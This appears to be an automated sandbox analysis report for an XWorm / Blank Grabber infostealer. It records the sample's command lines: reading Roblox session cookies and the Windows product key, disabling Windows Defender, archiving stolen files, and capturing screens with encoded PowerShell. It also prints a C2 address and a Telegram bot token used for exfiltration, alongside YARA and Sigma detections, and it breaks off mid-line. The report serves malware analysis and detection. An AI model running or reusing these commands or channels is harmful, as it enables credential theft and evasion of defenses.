cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8348 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8144 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8408 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5628 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7668 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5592 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7600 cmdline: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8632 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 4428 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7256 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6036 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7340 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7252 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7848 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8048 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7780 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

svchost.exe (PID: 7336 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

word.exe (PID: 8364 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)

word.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Roaming\word.exe" MD5: 8D8BC4B4831CCCE11284D512630749C5)

word.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Roaming\word.exe" MD5: 8D8BC4B4831CCCE11284D512630749C5)

word.exe (PID: 7956 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)

word.exe (PID: 4048 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)

word.exe (PID: 8684 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)

word.exe (PID: 8912 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["198.23.219.104"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
C:\Users\user\AppData\Roaming\word.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\word.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\word.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xec06:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeca3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xedb8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xdc9b:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xea06:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeaa3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xebb8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xda9b:$cnc4: POST / HTTP/1.1
00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: sB2ClgrGng.exe PID: 5816	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: sB2ClgrGng.exe PID: 2892	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: sB2ClgrGng.exe PID: 2892	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: sB2ClgrGng.exe PID: 2892	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: sB2ClgrGng.exe PID: 2892	JoeSecurity_PythonKeylogger	Yara detected Python Keylogger	Joe Security
Process Memory Space: sB2ClgrGng.exe PID: 2892	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: bound.exe PID: 7280	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: bound.exe PID: 7280	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.0.bound.exe.2f0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
15.0.bound.exe.2f0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.0.bound.exe.2f0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xec06:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeca3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xedb8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xdc9b:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", ProcessId: 4248, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5544, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", ProcessId: 5592, ProcessName: cmd.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7848, StartAddress: 213032B0, TargetImage: C:\Windows\System32\tree.com, TargetProcessId: 7848

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 